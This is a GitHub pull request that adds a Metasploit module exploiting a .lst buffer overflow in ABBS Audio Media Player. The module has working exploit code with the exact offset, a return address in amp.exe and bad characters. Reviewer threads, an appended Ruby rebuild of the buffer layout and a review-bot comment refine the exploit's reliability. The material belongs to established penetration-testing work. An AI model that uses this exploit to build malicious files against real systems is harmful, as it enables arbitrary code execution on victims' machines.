Added abbs amp exploit module #2038

Merged (7 commits), Jul 2, 2013
Changes from 4 commits
73 changes: 73 additions & 0 deletions modules/exploits/windows/fileformat/abbs_amp_lst.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'ABBS Audio Media Player .LST Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
occurs when adding an .lst, allowing arbitrary code execution with the privileges
of the user running the application . This module has been tested successfully on
ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julian Ahrens', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '75096' ],
[ 'EDB', '25204' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
},
'Targets' =>
[
[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
Contributor:
Is "\x00" a badchar, but can be used in the ret? I have not done badchars analysis myself, just asking because it sounds strange.

Contributor Author:
Ah yes, I forgot to remove the \x00 bad char. It doesn't affect the stack after all.

Contributor Author:
After a bit of research, we still need the \x00 to be in the BadChars list to make the exploit work. Please see my latest commit 478beee.

'Offset' => 4108
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 30 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
], self.class)

end

def exploit
buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(800)
Contributor:
Can you use rand_text here? Sounds like if the badchars analysis is accurate, you should be able to do it with rand_text.

Contributor Author:
I've done badchars analysis; badchars are "\x00\x0a\x0d". The weird thing is, if the ret address contains a null, it still works anyway. amp.exe is the only module that we can use to make the exploit reliable across platforms. Any suggestions on this?

Contributor:
Where did the 800 suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?

Contributor Author:
The 800 chars of padding were added to fill the buffer and trigger the overflow. Is there any nice way to fill the buffer?

Contributor:
Well, that would be clearer if you had a constant like OVERFLOW_LENGTH that then calculated the fill length by doing

overflow_fill = OVERFLOW_LENGTH - buffer.length
buffer << rand_text_alpha_upper(overflow_fill)

That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what is the shortest length you can use to trigger the overflow so you can send a smaller exploit.

Contributor Author:
Ah yes, OK, I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍
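To make the suggestion in this thread concrete, here is an added example that is not part of the PR or of the Metasploit module. It rebuilds the .lst layout from the module's own numbers (Offset 4108, the packed Ret, the 800-byte suffix) with the fill computed from a single total-length constant, and adds the two checks a reviewer would want: a guard against a payload longer than the offset (the module has no 'Space' limit, so that case silently produces a broken file) and a bad-character scan. The helper names (`build_lst`, `badchars_in`, `alpha_upper`, `ret_offset`), the `OVERFLOW_LENGTH` constant and the `0xcc` sample payload are assumptions for illustration, not the module's or the framework's API.

```ruby
# Added example (not from the PR or the Metasploit module): the .lst buffer
# layout as the module builds it, with the fill derived from a total-length
# constant as suggested in the review thread, plus the overlong-payload and
# bad-character checks the module lacks. Numeric values come from the module;
# helper names, OVERFLOW_LENGTH and the sample payload are made up here.

OFFSET          = 4108                  # bytes before the saved return address (module 'Offset')
RET             = 0x00412c91            # add esp,14 # pop # pop # pop # ret in amp.exe (module 'Ret')
SUFFIX_LENGTH   = 800                   # the module's fixed rand_text_alpha_upper(800)
OVERFLOW_LENGTH = OFFSET + 4 + SUFFIX_LENGTH   # 4912: total length of the generated file
BADCHARS        = "\x00\x0a\x0d".b      # module 'BadChars'

UPPER = ('A'..'Z').to_a

# Random upper-case filler of the given length (stand-in for rand_text_alpha_upper).
def alpha_upper(len)
  Array.new(len) { UPPER.sample }.join.b
end

# Bad characters present in data, as a (possibly empty) binary string.
def badchars_in(data, badchars = BADCHARS)
  data.b.each_char.select { |c| badchars.include?(c) }.uniq.join.b
end

# Build the .lst contents: payload, filler up to OFFSET, the packed return
# address, then filler up to OVERFLOW_LENGTH. Raises instead of silently
# producing a broken layout when the payload does not fit or carries a bad
# character. The return address is deliberately not scanned: as the thread
# notes, the module keeps an address whose top byte is 0x00.
def build_lst(payload)
  payload = payload.b
  if payload.length > OFFSET
    raise ArgumentError, "payload is #{payload.length} bytes, more than the #{OFFSET}-byte offset"
  end
  bad = badchars_in(payload)
  raise ArgumentError, "payload contains bad chars: #{bad.inspect}" unless bad.empty?

  buffer  = payload.dup
  buffer << alpha_upper(OFFSET - payload.length)      # pad exactly up to the saved EIP
  buffer << [RET].pack('V')                           # little-endian, ends in 0x00
  buffer << alpha_upper(OVERFLOW_LENGTH - buffer.length)  # suffix computed, not hard-coded
  buffer
end

# Offset at which the packed return address sits in a built buffer (sanity check).
def ret_offset(buffer)
  buffer.b.index([RET].pack('V'))
end

if __FILE__ == $0
  sample = "\xcc".b * 300   # constructed stand-in for payload.encoded (int3 sled)
  lst = build_lst(sample)
  puts "built #{lst.length} bytes, ret at offset #{ret_offset(lst)}"
end
```

Run it with `ruby` to see the layout; in a module the same arithmetic would replace the hard-coded 800, and a `'Space' => 4108` entry in the Payload hash would make the framework reject an oversized payload before the file is written.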


file_create(buffer)
end
end
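Review bot: the Payload hash sets BadChars but no 'Space', so `rand_text(target['Offset'] - (payload.encoded.length))` in `exploit` goes negative as soon as the encoded payload exceeds 4108 bytes and the return address no longer lands on the saved EIP; add `'Space' => 4108` so the framework rejects an oversized payload up front. The 4108 offset and the 800-byte suffix are two unexplained magic numbers; defining the total crash length as a constant and computing the suffix as that total minus `buffer.length`, as raised in the thread, makes the layout self-describing and lets you trim the file to the shortest length that still triggers the overflow. Since "\x00" is listed in BadChars yet `[target.ret].pack('V')` ends in 0x00, a one-line comment on why that byte is tolerated would save the next reader the same question. Minor: "when adding an .lst" in the Description is missing the word "file".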